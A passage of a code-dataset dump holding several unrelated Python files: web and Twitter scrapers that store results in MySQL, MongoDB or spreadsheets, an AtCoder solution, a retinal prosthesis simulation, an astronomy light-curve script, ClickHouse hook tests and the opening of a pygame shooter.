    ', re.DOTALL)\n items = re.search(pattern, article)\n if items:\n title = self.remove_blank(title.group(1))\n date = self.remove_blank(items.group(1))\n where = self.remove_blank(items.group(2))\n content = self.remove_blank(items.group(3))\n self.save(title, date, where, content)\n else:\n print(url, \" \", 'something wrong')\n\n def save(self, title, date, where, content):\n title = title.replace(\"\\\"\", '')\n print(\"title: \", title)\n file = open(self.path + title + '.md', 'w', encoding='gbk')\n file.write(date + '\\n\\n')\n file.write(where + '\\n\\n')\n file.write(content)\n file.close()\n conn = MySQLdb.connect(host=dbcfg.hostname, user=dbcfg.user, passwd=dbcfg.password, port=dbcfg.port)\n cur = conn.cursor()\n conn.set_character_set('gbk')\n cur.execute('SET NAMES gbk;')\n cur.execute('SET CHARACTER SET gbk;')\n cur.execute('SET character_set_connection=gbk;')\n # database name\n conn.select_db(dbcfg.dbname)\n abstract = self.get_abstract(content)\n value = [title, abstract, (dbcfg.url + title + '.md')]\n try:\n cur.execute('insert into ' + dbcfg.tbname + ' values(%s,%s,%s)', value)\n except _mysql_exceptions.IntegrityError as error:\n cur.execute('update ' + dbcfg.tbname+' set abstract = %s, url = %s where title = %s', (value[1], value[2], value[0]))\n finally:\n cur.close()\n conn.commit()\n conn.close()\n\n def get_abstract(self, article):\n content = re.sub(re.compile('!\\[alt image\\]\\(.*?\\)'), '', article)\n length = 100\n content = content.replace('\\n', '').replace(\"\\\"\", '')\n abstract = content[: length if len(content) > length else len(content)]\n print(\"abstract \", abstract)\n \"\"\"\n start = 0\n for i in range(0, 5):\n end = start + length- len(abstract)\n abstract += article[start:(end if len(article) > end else len(article))]\n abstract = re.sub(re.compile('!\\[alt image\\]\\(.*?\\)'), '', abstract)\n abstract = re.sub(re.compile('!\\[alt image\\]\\(.*?'), '', abstract)\n abstract = re.sub(re.compile('!\\[alt image\\]'), '', abstract)\n abstract = re.sub(re.compile('!\\[alt.*?'), '', abstract)\n abstract = re.sub(re.compile('!\\[.*?'), '', abstract)\n abstract = re.sub(re.compile('!\\['), '', abstract)\n abstract = abstract.strip()\n if len(abstract) >= 100:\n break\n else:\n start = end\n \"\"\"\n return abstract\n def replace_img(self, article):\n img_pattern = re.compile('', re.DOTALL)\n img_items = re.findall(img_pattern, article)\n if img_pattern:\n pattern = re.compile('.*?')\n for item in img_items:\n article = re.sub(pattern, '\\n![alt image](' + self.ROOT_URL + item + ')\\n', article, 1)\n img_pattern = re.compile('', re.DOTALL)\n img_items = re.findall(img_pattern, article)\n if img_pattern:\n pattern = re.compile('.*?')\n for item in img_items:\n article = re.sub(pattern, '\\n![alt image](' + self.ROOT_URL + item + ')\\n', article, 1)\n return article\n\n def remove_blank(self, content):\n content = content.strip()\n content = re.sub(re.compile('  '), '', content)\n content = re.sub(re.compile(' '), '', content)\n content = re.sub(re.compile('  '), '', content)\n content = re.sub(re.compile('   '), '', content)\n content = re.sub(re.compile(''), '', content)\n content = re.sub(re.compile('"'), '\"', content)\n content = re.sub(re.compile(''), '', content)\n content = re.sub(re.compile(''), '', content)\n return content\n\n def remove_Lf(self, content):\n pattern = re.compile('\\n|\\r')\n return re.sub(pattern, '', content)\n\n def run(self):\n tag_urls = self.extract_tags_url_from_tag_page()\n #print(tag_urls, '')\n for key, tag in tag_urls.items():\n pages = self.extract_page_url_from_certain_tag(tag)\n for page in pages:\n article_urls = self.extract_urls_from_certain_tag(page)\n for article in article_urls:\n self.extract_page_from_certain_article(article)\n\n\n","sub_path":"Python/Spider/utils/scrapy.py","file_name":"scrapy.py","file_ext":"py","file_size_in_byte":7853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"51088371","text":"def updateQuery(query, last_id, resultType, timezone, subquery, users):\r\n \r\n # Define functions\r\n def nl():\r\n print ('')\r\n \r\n def trackUsers(dataset, users):\r\n \r\n if len(users) > 1:\r\n \r\n for user in users:\r\n \r\n response = dataset[['Tweet', 'Fecha Publicación', 'Usuario', 'ids', 'RTs', 'FAVs',\r\n 'Enlace']][dataset['Usuario'] == user]\r\n \r\n if len(response) > 0:\r\n \r\n print (user, 'user has', len(response), 'matches.')\r\n \r\n result = response[['Tweet', 'Fecha Publicación', 'Usuario', 'ids', 'RTs', 'FAVs', 'Enlace']]\r\n result = result.sort_values(by='Fecha Publicación')\r\n \r\n result.to_csv(path_or_buf='1. Data/usuarios_y_keywords.csv', sep=',', header=False, index=False, mode='a')\r\n \r\n else:\r\n \r\n print (user, 'subquery has no matches!')\r\n \r\n elif len(users) == 1:\r\n \r\n user = users[0]\r\n \r\n response = dataset[['Tweet', 'Fecha Publicación', 'Usuario', 'ids', 'RTs', 'FAVs',\r\n 'Enlace']][dataset['Usuario'] == user]\r\n \r\n if len(response) > 0:\r\n\r\n print (user, 'user has', len(response), 'matches.')\r\n\r\n result = response[['Tweet', 'Fecha Publicación', 'Usuario', 'ids', 'RTs', 'FAVs', 'Enlace']]\r\n result = result.sort_values(by='Fecha Publicación')\r\n \r\n result.to_csv(path_or_buf='1. Data/usuarios_y_keywords.csv', sep=',', header=False, index=False, mode='a')\r\n\r\n else:\r\n\r\n print (user, 'subquery has no matches!')\r\n \r\n else:\r\n \r\n pass\r\n \r\n \r\n alltweets = []\r\n \r\n # using max_id parameter\r\n try:\r\n statuses = t.search.tweets(q = query, result_type = resultType, count = 100, max_id=last_id)\r\n \r\n tweets = statuses['statuses']\r\n \r\n alltweets.extend(tweets)\r\n \r\n # Create oldest id\r\n oldest = alltweets[-1]['id'] - 1\r\n\r\n try:\r\n\r\n while len(statuses) > 0:\r\n\r\n statuses = t.search.tweets(q = query, result_type= resultType, count=100, max_id=oldest)\r\n tweets = statuses['statuses']\r\n alltweets.extend(tweets)\r\n oldest = alltweets[-1]['id'] - 1\r\n\r\n except TwitterHTTPError:\r\n\r\n print ('No more tweets')\r\n nl()\r\n\r\n print ('%s fue el total de tweets descargados.' % (len(alltweets)))\r\n nl()\r\n\r\n # Create information lists\r\n ids = [tweet['id_str'] for tweet in alltweets]\r\n fecha = [tweet['created_at'] for tweet in alltweets]\r\n textstatus = [tweet['text'] for tweet in alltweets]\r\n user = [tweet['user']['screen_name'] for tweet in alltweets]\r\n rts = [tweet['retweet_count'] for tweet in alltweets]\r\n favs = [tweet['favorite_count'] for tweet in alltweets]\r\n \r\n enlaces = []\r\n for item in ids:\r\n enlace = 'https://twitter.com/statuses/' + str(item)\r\n enlaces.append(enlace)\r\n \r\n buildata = {'Tweet': Series(textstatus), 'Usuario': Series(user), 'RTs': Series(rts), 'FAVs': Series(favs),\r\n 'Enlace': Series(enlaces), 'ids': Series(ids), 'fecha': Series(fecha)}\r\n \r\n dfdata = DataFrame(buildata)\r\n \r\n dfdata['Time'] = pandas.to_datetime(dfdata['fecha'], utc=True, box=False)\r\n local_tz = pytz.timezone(timezone)\r\n dfdata['UTC'] = [item.tz_localize('UTC') for item in dfdata['Time']]\r\n dfdata['New UTC'] = [item.tz_convert(local_tz) for item in dfdata['UTC']]\r\n \r\n # extract date time\r\n date_time = pandas.DatetimeIndex(dfdata['New UTC'])\r\n dfdata['Fecha Publicación'] = date_time.strftime('%Y-%m-%d %H:%M')\r\n \r\n # Sort values by date time\r\n newdf = dfdata.sort_values(by='Fecha Publicación')\r\n \r\n if len(subquery) > 1:\r\n \r\n for word in subquery:\r\n \r\n newdata = newdf[newdf['Tweet'].str.contains(word, flags = re.IGNORECASE)]\r\n \r\n if len(newdata) > 0:\r\n \r\n print (word, 'subquery has', len(newdata), 'matches.')\r\n \r\n trackdata = newdata[['Tweet', 'Fecha Publicación', 'Usuario', 'ids', 'RTs', 'FAVs', 'Enlace']]\r\n trackfile = trackdata.sort_values(by='Fecha Publicación')\r\n trackfile.to_excel(excel_writer = '1. Data/subquery_%s.xlsx' % word, header=True, index=False)\r\n \r\n userTrack = trackUsers(trackfile, users)\r\n nl()\r\n \r\n else:\r\n \r\n print (word, 'subquery has no matches!')\r\n nl()\r\n \r\n elif len(subquery) == 1:\r\n \r\n word = subquery[0]\r\n \r\n newdata = newdf[newdf['Tweet'].str.contains(word, flags = re.IGNORECASE)]\r\n \r\n if len(newdata) > 0:\r\n \r\n print (word, 'subquery has', len(newdata), 'matches.')\r\n \r\n trackdata = newdata[['Tweet', 'Fecha Publicación', 'Usuario', 'ids', 'RTs', 'FAVs', 'Enlace']]\r\n trackfile = trackdata.sort_values(by='Fecha Publicación')\r\n trackfile.to_excel(excel_writer = '1. Data/subquery_%s.xlsx' % word, header=True, index=False)\r\n \r\n userTrack = trackUsers(trackfile, users)\r\n nl()\r\n \r\n else:\r\n \r\n print (word, 'subquery has no matches!')\r\n nl()\r\n \r\n else:\r\n \r\n pass\r\n \r\n # new oldest\r\n newoldest = int(newdf['ids'].iloc[0]) - 1\r\n \r\n if len(newdf) <= 60000:\r\n \r\n # write excel file with all tweets\r\n excelFile = newdf[['Tweet', 'Fecha Publicación', 'Usuario', 'ids', 'RTs', 'FAVs', 'Enlace']]\r\n excelFile.to_excel(excel_writer = '1. Data/query_%s.xlsx' % query, header=True, index=False)\r\n \r\n else:\r\n \r\n csvFile = newdf[['Tweet', 'Fecha Publicación', 'Usuario', 'ids', 'RTs', 'FAVs', 'Enlace']]\r\n csvfile.to_csv(path_or_buf='1. Data/query_%s.xlsx' % query, sep=',', header=True, index=False)\r\n \r\n \r\n nl()\r\n print ('Último id', newoldest)\r\n\r\n \r\n except IndexError:\r\n\r\n print ('No more tweets before last id:', last_id)\r\n nl()","sub_path":"Twitterpy/RetrackKeywords.py","file_name":"RetrackKeywords.py","file_ext":"py","file_size_in_byte":6971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"477066960","text":"h, w = list(map(int, input().split()))\nS = []\nfor _ in range(h):\n s = input()\n S.append(s)\n\n\n# print(S)\nd = [(0, 0), (0, 1), (1, 0), (1, 1)]\nans = 0\nfor i in range(h-1):\n for j in range(w-1):\n cnt = 0\n # print(i, j)\n for (di, dj) in d:\n if S[i+di][j+dj] == '#':\n cnt += 1\n if cnt in [1, 3]:\n ans += 1\nprint(ans)\n","sub_path":"atcoder/ABC191C.py","file_name":"ABC191C.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"237927919","text":"import pulse2percept as p2p\nfrom glob import glob\nimport sys\nimport numpy as np\nfrom os.path import split, splitext, join\n\ndef main():\n if len(sys.argv) < 3:\n print('Usage: ./robosapiens-images.py ')\n return\n\n # Model string\n pathstr = sys.argv[1]\n modelstr = sys.argv[2]\n preprocess = np.int(sys.argv[3])\n prestr = '-pre' if preprocess else ''\n \n rho = int(sys.argv[4]) if len(sys.argv) >= 5 else 100\n rhostr = 'rho%d-' % rho\n axlambda = int(sys.argv[5]) if len(sys.argv) >= 6 else 100\n lmbstr = ('lmb%d-' % axlambda) if modelstr == 'axonmap' else ''\n \n models = {\n 'scoreboard': p2p.models.ScoreboardModel,\n 'axonmap': p2p.models.AxonMapModel\n }\n \n # Set up the axon map model at a reasonable step size.\n # Might want to play with different values for rho/lambda:\n model = models[modelstr](xrange=(-25, 15), yrange=(-15, 15), xystep=0.5,\n engine='serial', rho=rho)\n if modelstr == 'axonmap':\n model.build(axlambda=axlambda, n_axons=1500)\n else:\n model.build()\n \n for file in glob(join(pathstr, '*.jpg')):\n print(file)\n # For each grid, generate the percept and store it in the list:\n path, fname = split(file)\n fstr, fext = splitext(fname)\n img = p2p.stimuli.ImageStimulus(file, as_gray=True)\n for n in np.arange(2, 18):\n gsize = (4 * n, 6 * n)\n # Make all implants span the same area on the retina, so we need to adjust\n # the electrode-to-electrode spacing depending on how many rows/columns in\n # the grid:\n spacing = 10000.0 / gsize[1]\n grid = p2p.implants.ElectrodeGrid(gsize, x=-1500, spacing=spacing, \n etype=p2p.implants.DiskElectrode, r=100)\n implant = p2p.implants.ProsthesisSystem(grid)\n if preprocess:\n implant.stim = img.filter('median').filter('sobel').resize(gsize)\n else:\n implant.stim = img.resize(gsize)\n percept = model.predict_percept(implant)\n pfname = join(path, 'percepts', '%s-%s%s-%s%s%dx%d%s' % (fstr, modelstr, prestr, rhostr, lmbstr, *gsize, fext))\n percept.save(pfname, shape=img.img_shape)\n \n\nif __name__ == \"__main__\":\n main()\n","sub_path":"robosapiens-images.py","file_name":"robosapiens-images.py","file_ext":"py","file_size_in_byte":2418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"506600285","text":"# -*- coding: utf-8 -*-\nimport os, sys, datetime\nfrom lxml import html\nfrom pyquery import PyQuery as pq\nimport gevent\nfrom gevent.event import Event\nfrom gevent import monkey; monkey.patch_all()\nimport json\n\nreload(sys)\nsys.setdefaultencoding(\"utf-8\")\n\n\nsys.path.append(os.path.join(os.path.split(os.path.realpath(__file__))[0], '..'))\nimport BaseCrawler\n\nsys.path.append(os.path.join(os.path.split(os.path.realpath(__file__))[0], '../../../../util'))\nimport loghelper,extract,db,util,url_helper,download\n\nsys.path.append(os.path.join(os.path.split(os.path.realpath(__file__))[0], '../../parser/util2'))\nimport parser_mysql_util\nimport parser_mongo_util\n\n#logger\nloghelper.init_logger(\"crawler_Kr36_newfs\", stream=True)\nlogger = loghelper.get_logger(\"crawler_Kr36_newfs\")\n\n#mongo\nmongo = db.connect_mongo()\ncollection_news = mongo.article.news\n\nnewsid = []\nb_id =\"\"\n\nTYPE = 60008\n\ndef find_companyId(sourceId):\n if sourceId== \"0\" or sourceId==0:\n return None\n conn = db.connect_torndb()\n sc = conn.get(\"select * from source_company where source=%s and sourceId=%s\", 13020, sourceId)\n if sc is not None:\n if sc[\"companyId\"] is not None:\n return sc[\"companyId\"]\n return None\n\n\n\nclass kr36Crawler(BaseCrawler.BaseCrawler):\n def __init__(self):\n BaseCrawler.BaseCrawler.__init__(self)\n\n def is_crawl_success(self, url, content):\n if content is not None:\n try:\n j = json.loads(content)\n # logger.info(j)\n except:\n return False\n\n if j.has_key(\"data\"):\n return True\n\n return False\n\nclass kr36NewsCrawler(BaseCrawler.BaseCrawler):\n def __init__(self):\n BaseCrawler.BaseCrawler.__init__(self)\n\n def is_crawl_success(self, url, content):\n if content.find(\"\") == -1:\n return False\n d = pq(html.fromstring(content.decode(\"utf-8\")))\n title = d('head> title').text().strip()\n logger.info(\"title: \" + title + \" \" + url)\n if title.find(\"36氪_为创业者提供最好的产品和服务\") != -1:\n return False\n if title.find(\"36氪\") >= 0:\n return True\n # logger.info(content)\n return False\n\n\ndef has_content(content):\n # logger.info(newsid)\n if content is not None:\n try:\n j = json.loads(content)\n except:\n logger.info(\"Not json content\")\n logger.info(content)\n return False\n if j[\"code\"] == 0:\n return True\n else:\n logger.info(\"code=%d, %s\" % (j[\"code\"], j[\"msg\"]))\n else:\n logger.info(\"Fail to get content\")\n return False\n\ndef has_news_content(item):\n if item.has_key(\"description\") is False:\n return False\n return True\n\n\ndef process_news(item):\n if has_news_content(item):\n\n\n news_time = datetime.datetime.strptime(item[\"published_at\"],\"%Y-%m-%d %H:%M:%S\")\n\n title = item[\"title\"]\n\n key = str(item[\"id\"])\n\n url = \"http://36kr.com/newsflashes/%s\" % key\n flag, domain = url_helper.get_domain(url)\n dnews = {\n \"date\": news_time - datetime.timedelta(hours=8),\n \"title\": title,\n \"link\": url,\n \"createTime\": datetime.datetime.now(),\n \"source\": 13020,\n \"key\": key,\n \"key_int\": int(key),\n \"type\": TYPE,\n \"original_tags\":[],\n \"processStatus\":0,\n # \"companyId\":companyId,\n \"companyIds\": [],\n \"category\": None,\n \"domain\": domain,\n \"categoryNames\": []\n }\n\n dcontents = []\n if item[\"description\"] is not None:\n dc = {\n \"rank\": 1,\n \"content\": \"36氪快讯\",\n \"image\": \"\",\n \"image_src\": \"\",\n }\n\n dcontents.append(dc)\n dc = {\n \"rank\": 2,\n \"content\": item[\"description\"],\n \"image\": \"\",\n \"image_src\": \"\",\n }\n dcontents.append(dc)\n if item.has_key(\"news_url\") is True and item[\"news_url\"] is not None:\n dc = {\n \"rank\": 3,\n \"content\": item[\"news_url\"],\n \"image\": \"\",\n \"image_src\": \"\",\n }\n dcontents.append(dc)\n logger.info(item[\"description\"])\n\n\n dnews[\"contents\"] = dcontents\n\n brief = util.get_brief_from_news(dcontents)\n\n post = util.get_posterId_from_news(dcontents)\n dnews[\"postId\"] = post\n # dnews[\"post\"] = post\n dnews[\"brief\"] = brief\n if news_time > datetime.datetime.now():\n logger.info(\"Time: %s is not correct with current time\", news_time)\n dnews[\"date\"] = datetime.datetime.now() - datetime.timedelta(hours=8)\n\n # collection_news.insert(dnews)\n nid = parser_mongo_util.save_mongo_news(dnews)\n logger.info(\"Done: %s\", nid)\n\n\n\n\ndef process_page(content, flag):\n logger.info(newsid)\n while True:\n if len(newsid) == 0:\n break\n newsid.pop(0)\n bid = None\n j = json.loads(content)\n infos = j[\"data\"][\"items\"]\n if infos is not None:\n for info in infos:\n key = info[\"id\"]\n title = info[\"title\"]\n date = info[\"published_at\"]\n # logger.info(\"%s, %s, %s\", key, date, title)\n\n if collection_news.find_one({\"source\": 13020, \"key_int\": int(key), \"type\":60008}) is None or flag == \"all\":\n craw = True\n newses = list(collection_news.find({\"title\": title}))\n for news in newses:\n if news.has_key(\"type\") and news[\"type\"] > 0:\n craw = False\n break\n if craw:\n logger.info(\"%s, %s, %s\", key, date, title)\n newsid.append(key)\n process_news(info)\n\n bid = key\n\n return len(newsid), bid\n\n\ndef start_run(flag):\n logger.info(newsid)\n global b_id\n while True:\n logger.info(\"36kr news %s start...\", flag)\n\n crawler = kr36Crawler()\n while True:\n page_url = \"http://36kr.com/api/newsflash?b_id%s=&per_page=20\" % b_id\n\n result = crawler.crawl(page_url, agent=True)\n if result['get'] == 'success':\n if has_content(result[\"content\"]):\n numnews, b_id = process_page(result[\"content\"], flag)\n if numnews > 0 or flag == \"all\":\n logger.info(\"crawler new news :%s\", numnews)\n # logger.info(\"news: %s\", \";\".join(newsid))\n # continue\n else:\n b_id = \"\"\n else:\n b_id = \"\"\n logger.info(\"no content\")\n logger.info(result[\"content\"])\n break\n\n\n logger.info(\"36kr news %s end.\", flag)\n\n if flag == \"incr\":\n gevent.sleep(60*5) #10 minutes\n else:\n gevent.sleep(86400*3) #3 days\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) > 1:\n param = sys.argv[1]\n if param == \"all\":\n start_run(\"all\")\n else:\n start_run(\"incr\")\n else:\n start_run(\"incr\")","sub_path":"data/spider2/crawler/news/kr36_flashes.py","file_name":"kr36_flashes.py","file_ext":"py","file_size_in_byte":7442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"129064313","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\ndef interpolate_x(X, Y, y):\r\n return X[0] + ((y - X[1])*(Y[0] - X[0]))/(Y[1] - X[1])\r\n\r\n\r\ndef interpolate_y(X, Y, x):\r\n return X[1] + ((x - X[0])*(Y[1] - X[1]))/(Y[0] - X[0])\r\n\r\n\r\ndef mirror_data(x_input, y_input, ind, refl):\r\n if ind is not None:\r\n x_mir = x_input[ind] + (x_input[ind] - x_input)\r\n else:\r\n x_mir = refl + (refl - x_input)\r\n y_mir = y_input\r\n\r\n return x_mir, y_mir\r\n\r\n\r\ndef cut_data(x_input, y_input, x_mir, y_mir):\r\n if x_input[0] <= x_mir[-1]:\r\n left_limit = x_mir[-1]\r\n else:\r\n left_limit = x_input[0]\r\n\r\n if x_input[-1] >= x_mir[0]:\r\n right_limit = x_mir[0]\r\n else:\r\n right_limit = x_input[-1]\r\n\r\n x_input_cut = x_input[(left_limit < x_input) & (x_input < right_limit)]\r\n x_mir_cut = x_mir[(left_limit < x_mir) & (x_mir < right_limit)]\r\n y_input_cut = y_input[(left_limit < x_input) & (x_input < right_limit)]\r\n y_mir_cut = y_mir[(left_limit < x_mir) & (x_mir < right_limit)]\r\n\r\n return x_input_cut, y_input_cut, x_mir_cut, y_mir_cut\r\n\r\n\r\ndef cut_data2(x_input1, y_input1, x_input2, y_input2):\r\n if x_input1[0] < x_input2[0]:\r\n left_limit = x_input2[0]\r\n else:\r\n left_limit = x_input1[0]\r\n\r\n if x_input1[-1] > x_input2[-1]:\r\n right_limit = x_input2[-1]\r\n else:\r\n right_limit = x_input1[-1]\r\n\r\n x_input1_cut = x_input1[(left_limit < x_input1) & (x_input1 < right_limit)]\r\n x_input2_cut = x_input2[(left_limit < x_input2) & (x_input2 < right_limit)]\r\n y_input1_cut = y_input1[(left_limit < x_input1) & (x_input1 < right_limit)]\r\n y_input2_cut = y_input2[(left_limit < x_input2) & (x_input2 < right_limit)]\r\n\r\n return x_input1_cut, y_input1_cut, x_input2_cut, y_input2_cut\r\n\r\n\r\ndata = np.genfromtxt('aptau_20141028_2.lc', unpack=True)\r\nhjd = data[0]\r\nmag = data[1]\r\n\r\n# Define the mag limits\r\nymax = max(mag)\r\nif mag[0] > mag[-1]:\r\n ymin = mag[0]\r\nelse:\r\n ymin = mag[-1]\r\n\r\n# Time step in checking the minimum\r\ntime_step = 0.1/86400\r\n\r\n# Initial reflexion axis\r\nreflex_index = np.argmax(mag)\r\nreflex_axis = hjd[reflex_index]\r\n\r\n# Mirroring data\r\nhjd_mirror, mag_mirror = mirror_data(hjd, mag, ind=None, refl=reflex_axis)\r\n\r\n# Linear interpolation to get two magnitude points for one time point\r\nhjd_inter = np.array([])\r\nmag_inter = np.array([])\r\nfor i in range(len(hjd_mirror)):\r\n for j in range(len(hjd)):\r\n if hjd[j] < hjd_mirror[i] <= hjd[j+1]:\r\n hjd_inter = np.append(hjd_inter, hjd_mirror[i])\r\n mag_inter = np.append(mag_inter, interpolate_y([hjd[j], mag[j]], [hjd[j+1], mag[j+1]], hjd_mirror[i]))\r\n\r\nif hjd_inter[0] < hjd_inter[-1]:\r\n left = hjd_inter[0]\r\n right = hjd_inter[-1]\r\nelse:\r\n left = hjd_inter[-1]\r\n right = hjd_inter[0]\r\n\r\n# Cut out the region with two points for one time point (to eliminate standalone points)\r\nhjd_cut = hjd_mirror[(hjd_mirror >= left) & (hjd_mirror <= right)]\r\nmag_cut = mag_mirror[(hjd_mirror >= left) & (hjd_mirror <= right)]\r\n\r\n# Calculate chi square for this cut out\r\nchi_sq = np.sum((mag_cut - mag_inter)**2)\r\n\r\n# for i in range(len(mag_inter)):\r\n# print(i)\r\n# plt.plot(hjd, mag, '.b', hjd_mirror, mag_mirror, '.k', hjd_cut[i], mag_cut[i], 'or', hjd_inter[i], mag_inter[i], 'ok')\r\n# plt.show()\r\n\r\n# plt.figure(0)\r\n# plt.plot(hjd, mag, '.b', hjd_mirror, mag_mirror, '.k', hjd_inter, mag_inter, 'or', hjd_cut, mag_cut, '.r', mfc='none')\r\n# plt.axvline(hjd_inter[0])\r\n# plt.axvline(hjd_inter[-1])\r\n# print(len(mag_cut), len(mag_inter))\r\nplt.figure(1)\r\nplt.plot(hjd_cut, mag_cut, '.b', hjd_inter, mag_inter, '.r')\r\nplt.title('Chi square = {}'.format(chi_sq))\r\nplt.show()\r\n","sub_path":"kwee_2.2.py","file_name":"kwee_2.2.py","file_ext":"py","file_size_in_byte":3691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"194445298","text":"from unittest import TestCase, mock\n\nfrom clickhouse_driver.errors import ServerException, ErrorCodes\n\nfrom tests.util import LocalClickHouseHook\n\n\nclass ClientFromUrlTestCase(TestCase):\n def test_temp_table(self):\n hook = LocalClickHouseHook()\n temp_table_name = 'test_temp_table'\n result = hook.run((\n f'CREATE TEMPORARY TABLE {temp_table_name} (test_field UInt8)',\n f'INSERT INTO {temp_table_name} '\n f'SELECT number FROM system.numbers WHERE number < 5 LIMIT 5',\n f'SELECT SUM(test_field) FROM {temp_table_name}',\n ))\n self.assertListEqual([(10,)], result)\n try:\n # a new connection is created\n hook.run(f'SELECT * FROM {temp_table_name}')\n except ServerException as err:\n self.assertEqual(ErrorCodes.UNKNOWN_TABLE, err.code)\n else:\n raise AssertionError('server did not raise an error')\n\n\nclass HookLogQueryTestCase(TestCase):\n def setUp(self) -> None:\n self.hook = LocalClickHouseHook()\n\n def test_log_params_dict(self):\n self.assertEqual('{}', self.hook._log_params({}))\n self.assertEqual('{1: 1}', self.hook._log_params({1: 1}))\n self.assertEqual('{1: 1}', self.hook._log_params({1: 1}, limit=1))\n self.assertEqual(\n '{1: 1 … and 1 more parameters}',\n self.hook._log_params({1: 1, 2: 2}, limit=1),\n )\n self.assertEqual(\n '{1: 1, 2: 2}',\n self.hook._log_params({1: 1, 2: 2}),\n )\n self.assertEqual(\n '{0: 0, 1: 1, 2: 2, 3: 3, 4: 4, 5: 5, 6: 6, 7: 7, 8: 8, 9: 9 …'\n ' and 1 more parameters}',\n self.hook._log_params({k: k for k in range(11)}),\n )\n self.assertEqual(\n '{0: 0, 1: 1, 2: 2, 3: 3, 4: 4, 5: 5, 6: 6, 7: 7, 8: 8, 9: 9 …'\n ' and 10 more parameters}',\n self.hook._log_params({k: k for k in range(20)}),\n )\n self.assertEqual(\n '{0: 0, 1: 1, 2: 2, 3: 3, 4: 4, 5: 5, 6: 6, 7: 7, 8: 8, 9: 9 …'\n ' and 10 more parameters}',\n self.hook._log_params({k: k for k in range(20)}, limit=10),\n )\n\n def test_log_params_generator(self):\n def gen():\n yield\n g = gen()\n self.assertEqual(str(g), self.hook._log_params(g))\n\n def test_log_params_tuple(self):\n self.assertEqual('()', self.hook._log_params(()))\n self.assertEqual('(1,)', self.hook._log_params((1, )))\n self.assertEqual('(1,)', self.hook._log_params((1, ), limit=1))\n self.assertEqual(\n '(1, … and 1 more parameters)',\n self.hook._log_params((1, 2), limit=1),\n )\n self.assertEqual(\n '(1, 2)',\n self.hook._log_params((1, 2)),\n )\n self.assertEqual(\n '(0, 1, 2, 3, 4, 5, 6, 7, 8, 9 … and 1 more parameters)',\n self.hook._log_params(tuple(range(11))),\n )\n self.assertEqual(\n '(0, 1, 2, 3, 4, 5, 6, 7, 8, 9 … and 10 more parameters)',\n self.hook._log_params(tuple(range(20))),\n )\n self.assertEqual(\n '(0, 1, 2, 3, 4, 5, 6, 7, 8, 9 … and 10 more parameters)',\n self.hook._log_params(tuple(range(20)), limit=10),\n )\n\n def test_log_params_list(self):\n self.assertEqual('[]', self.hook._log_params([]))\n self.assertEqual('[1]', self.hook._log_params([1]))\n self.assertEqual('[1]', self.hook._log_params([1], limit=1))\n self.assertEqual(\n '[1 … and 1 more parameters]',\n self.hook._log_params([1, 2], limit=1),\n )\n self.assertEqual(\n '[1, 2]',\n self.hook._log_params([1, 2]),\n )\n self.assertEqual(\n '[0, 1, 2, 3, 4, 5, 6, 7, 8, 9 … and 1 more parameters]',\n self.hook._log_params(list(range(11))),\n )\n self.assertEqual(\n '[0, 1, 2, 3, 4, 5, 6, 7, 8, 9 … and 10 more parameters]',\n self.hook._log_params(list(range(20))),\n )\n self.assertEqual(\n '[0, 1, 2, 3, 4, 5, 6, 7, 8, 9 … and 10 more parameters]',\n self.hook._log_params(list(range(20)), limit=10),\n )\n\n def test_log_query(self):\n _ = self.hook.log # to initialize .log property\n with mock.patch.object(self.hook, '_log') as patched:\n self.hook._log_query('SELECT 1', {})\n patched.info.assert_called_with('%s%s', 'SELECT 1', '')\n self.hook._log_query('SELECT 1', {1: 1})\n patched.info.assert_called_with('%s%s', 'SELECT 1', ' with {1: 1}')\n self.hook._log_query('SELECT 1', [1])\n patched.info.assert_called_with('%s%s', 'SELECT 1', ' with [1]')\n\n\nclass HookGetAsPandasTestCase(TestCase):\n def test_get_pandas_df(self):\n import pandas as pd\n\n hook = LocalClickHouseHook()\n for sql, expected in (\n (\n '''\n SELECT\n number,\n concat('result: ', toString(number + number)) AS n_sum\n FROM system.numbers\n WHERE number < 4\n LIMIT 3\n ''',\n pd.DataFrame.from_dict({\n 'number': (0, 1, 2),\n 'n_sum': ('result: 0', 'result: 2', 'result: 4'),\n })\n ),\n # empty df\n (\n '''\n SELECT\n number,\n concat('result: ', toString(number + number)) AS n_sum\n FROM (\n SELECT number\n FROM system.numbers\n WHERE number < 4\n LIMIT 3\n )\n WHERE number > 4\n ''',\n pd.DataFrame(columns=['number', 'n_sum'])\n )\n ):\n df = hook.get_pandas_df(sql)\n self.assertListEqual(list(df.columns), list(expected.columns))\n self.assertListEqual(\n df.to_dict('records'),\n expected.to_dict('records'),\n )\n","sub_path":"tests/test_hook.py","file_name":"test_hook.py","file_ext":"py","file_size_in_byte":6174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"495337676","text":"import pygame\nimport random\nimport sys\n\npygame.init()\nWIDTH, HEIGHT = 750, 750\nscreen = pygame.display.set_mode((WIDTH, HEIGHT))\npygame.display.set_caption(\"Space Shooter\")\nclock = pygame.time.Clock()\nblock_size = 75\nwhite = (255, 255, 255)\nred = (200, 0, 0)\npygame.font.init()\nmyfont = pygame.font.SysFont('Comic Sans MS', 30)\nyou_lost_font = pygame.font.SysFont('Comic Sans MS', 40)\n\n# Load images\nspaceship = pygame.image.load(\"spaceship.png\")\nblue_laser = pygame.image.load(\"blue_laser.png\")\ngreenlaser = pygame.image.load(\"greenlaser.png\")\nred_laser = pygame.image.load(\"redlaser.png\")\nblue_enemy_ship = pygame.image.load(\"blue_enemy.png\")\ngrey_enemy_ship = pygame.image.load(\"grey_enemy.png\")\nbackground = pygame.image.load(\"background.png\")\nbackground = pygame.transform.scale(background, (WIDTH, HEIGHT)) # to match the size of our window\nspaceship = pygame.transform.scale(spaceship, (100, 100))\nblue_laser = 